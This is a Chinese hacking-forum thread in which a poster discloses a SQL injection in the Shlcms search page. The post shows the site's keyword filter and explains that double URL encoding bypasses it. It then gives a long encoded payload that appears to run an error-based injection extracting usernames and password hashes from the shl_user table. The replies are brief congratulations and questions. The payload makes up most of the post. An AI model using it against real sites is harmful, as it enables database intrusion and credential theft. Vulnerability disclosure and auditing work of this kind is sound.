【新年快乐】Shlcms 注入漏洞

ebang · 发表于 2014-1-1 15:39:36

新的一年也是自己的第16个生日,所以在今天写点自己挖的渣渣洞出来,祝自己生日快乐。
我不太会,所以只能挖这些渣渣咯
___________________________________________________________________________

新版的shlcms中

[AppleScript] 纯文本查看 复制代码

shlcms\content\search\index.php对keyword做了过滤

[attach]2546[/attach]

function checkSqlStr($string)

{

      $string = strtolower($string);

      return preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|_user/i', $string);

}

因为会解码所以无视过滤的没过滤%就好。。

[AppleScript] 纯文本查看 复制代码

keyword=yu%25%2527%25%36%31%25%36%45%25%36%34%25%32%38%25%37%33%25%36%35%25%36%43%255%37%34%25%32%38%25%32%41%25%32%39%25%32%43%25%36%33%25%36%46%25%36%45%25%36%33%25%36%31%25%37%34%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%30%25%36%36%25%37%32%25%36%46%25%36%44%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%30%25%36%33%25%36%46%25%37%35%25%36%45%2%25%32%38%25%36%36%25%36%43%25%36%46%25%36%46%25%37%32%25%32%38%25%37%32%25%36%31%25%36%45%25%36%34%25%32%38%25%33%30%25%32%39%25%32%41%25%33%32%25%32%39%25%32%43%25%33%30%25%37%38%25%33%33%25%36%31%25%32%43%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%38%25%35%33%25%34%35%25%34%43%25%34%35%25%34%33%25%35%34%25%32%30%25%36%33%25%36%46%25%36%45%25%36%33%25%36%31%25%37%34%25%32%38%25%37%35%25%37%33%25%36%35%25%37%32%25%36%45%25%36%31%25%36%44%25%36%35%25%32%43%25%33%30%25%37%38%25%33%33%25%36%31%25%32%43%25%37%30%25%37%37%25%36%34%25%32%39%25%34%36%25%35%32%25%34%46%25%34%44%25%32%30%25%37%33%25%36%38%25%36%43%25%35%46%25%37%35%25%37%33%25%36%35%25%37%32%25%32%30%25%36%43%25%36%39%25%36%44%25%36%39%25%37%34%25%32%30%25%33%30%25%32%43%25%33%31%25%32%39%25%32%39%25%36%36%25%37%32%25%36%46%25%36%44%25%32%30%25%36%39%25%36%45%25%36%36%25%36%46%25%37%32%25%36%44%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%35%46%25%37%33%25%36%33%25%36%38%25%36%35%25%36%44%25%36%31%25%32%45%25%37%34%25%36%31%25%36%32%25%36%43%25%36%35%25%37%33%25%32%30%25%36%43%25%36%39%25%36%44%25%36%39%25%37%34%25%32%30%25%33%30%25%32%43%25%33%31%25%32%39%25%32%39%25%37%38%25%32%30%25%36%36%25%37%32%25%36%46%25%36%44%25%32%30%25%36%39%25%36%45%25%36%36%25%36%46%25%37%32%25%36%44%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%35%46%25%37%33%25%36%33%25%36%38%25%36%35%25%36%44%25%36%31%25%32%45%25%37%34%25%36%31%25%36%32%25%36%43%25%36%35%25%37%33%25%32%30%25%36%37%25%37%32%25%36%46%25%37%35%25%37%30%25%32%30%25%36%32%25%37%39%25%32%30%25%37%38%25%32%39%25%36%31%25%32%39%25%32%30%25%36%31%25%36%45%25%36%34%25%32%30%25%33%31%25%33%44%25%33%31%23

密码好像是sha1 +md5 加什么什么的反正一般破不出来就对了。

黑水 · 发表于 2014-1-1 15:58:25

m帽是你下发到法克的吧。。

支持你了。。辛苦了。审计累啊

契约 · 发表于 2014-1-1 19:34:07

楼主的生日正好在元旦？？

lxzhtxh13 · 发表于 2014-1-2 10:39:12

难道不成要手动转码~

孙悟饭的! · 发表于 2014-1-15 19:23:57

16岁，

【新年快乐】Shlcms 注入漏洞

评分

指导单位

旗下站点

联系我们